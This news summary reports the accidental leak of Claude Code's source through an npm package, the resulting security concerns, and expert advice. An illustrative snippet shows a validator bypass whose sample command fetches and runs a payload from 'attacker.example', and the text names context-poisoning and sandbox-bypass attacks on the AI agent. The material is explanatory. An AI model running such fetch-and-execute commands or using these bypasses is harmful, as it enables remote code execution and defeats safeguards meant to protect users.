50/FIFTY

Today's stories, rewritten neutrally

AI · Apr 2

Anthropic Source Code Leak Exposes AI Coding Agent Architecture to Competitors

Anthropic accidentally released 512,000 lines of Claude Code source code in an npm package, revealing security vulnerabilities and internal architecture details.

Synthesized from 7 sources

Anthropic accidentally exposed the complete source code of its Claude Code AI coding agent on March 31 when a 59.8 MB source map file was included in version 2.1.88 of its npm package. The leak revealed 512,000 lines of unobfuscated TypeScript across 1,906 files, including the complete permission model, security validators, and references to unreleased features.

Security researcher Chaofan Shou discovered the exposure around 4:23 UTC, and mirror repositories quickly spread across GitHub before Anthropic could contain the leak. The company attributed the exposure to a human packaging error and stated that no customer data or model weights were involved. Anthropic initially filed copyright takedown requests that removed more than 8,000 copies from GitHub, though it later called the broad takedown unintended and retracted most of the notices.

The leaked codebase reveals the technical architecture that enables Claude Code to use tools, manage files, execute bash commands, and orchestrate multi-agent workflows. Security experts identified potential attack vectors, including context poisoning through configuration files and sandbox bypass techniques that exploit parsing differentials in the bash command validation system. The source code shows Claude Code uses a 46,000-line query engine with three-layer compression and 2,500 lines of bash security validation running 23 sequential checks on shell commands.
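The parsing-differential risk described above can be illustrated with a minimal sketch. The validator, allowlist, and command below are hypothetical, not Claude Code's actual code; they show only the general class of bug, in which a validator's tokenizer and the real shell disagree about what a command will do.

```python
import shlex

# Hypothetical allowlist for this sketch; not taken from the leaked code.
ALLOWED_COMMANDS = {"echo", "ls", "cat"}

def naive_validate(cmd: str) -> bool:
    """Approve a command if its first shlex token is allowlisted.

    Illustrative only: shlex tokenizes like a POSIX shell but performs
    no expansion, so it treats "$(...)" as inert text.
    """
    tokens = shlex.split(cmd)
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS

# The validator approves this command: the first token is "echo".
cmd = 'echo "$(curl http://attacker.example/payload | sh)"'
print(naive_validate(cmd))  # True
# But bash performs command substitution inside double quotes, so the
# curl | sh pipeline would run before echo ever received its argument:
# a parsing differential between the validator and the real shell.
```

A robust validator has to model expansion and substitution the way the target shell does, which is why a production implementation can grow to thousands of lines of checks.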

The leak coincided with the publication of malware-carrying versions of the axios package to the same npm registry. Teams that installed or updated Claude Code between 00:21 and 03:29 UTC on March 31 may have inadvertently downloaded both the exposed source code and the unrelated malware. This was Anthropic's second security incident in five days, following a separate configuration error that exposed nearly 3,000 internal assets.

According to Anthropic's public disclosures, approximately 90% of Claude Code's source code was AI-generated, which may weaken its intellectual-property protection under U.S. copyright law's human-authorship requirement. Security experts recommend that enterprises audit configuration files in cloned repositories, treat external servers as untrusted dependencies, and verify commit provenance in AI-assisted development.
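A first pass at the config-file audit recommended above might look like the following sketch. The filename patterns are illustrative guesses at where an AI coding agent could pick up instructions from a cloned repository; they are assumptions for this example, not a vetted or complete list.

```python
from pathlib import Path

# Illustrative patterns for files an agent might read into its context;
# assumptions for this sketch, not a vetted list.
SUSPECT_PATTERNS = ("*.mcp.json", ".cursorrules", "CLAUDE.md")

def find_suspect_configs(repo: Path) -> list[Path]:
    """Return config-like files in a cloned repo that deserve manual review."""
    hits: list[Path] = []
    for pattern in SUSPECT_PATTERNS:
        hits.extend(p for p in repo.rglob(pattern) if p.is_file())
    return sorted(hits)

if __name__ == "__main__":
    for path in find_suspect_configs(Path(".")):
        print(path)
```

Flagged files are not necessarily malicious; the point of the audit is that anything an agent treats as instructions should be reviewed with the same care as executable code.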
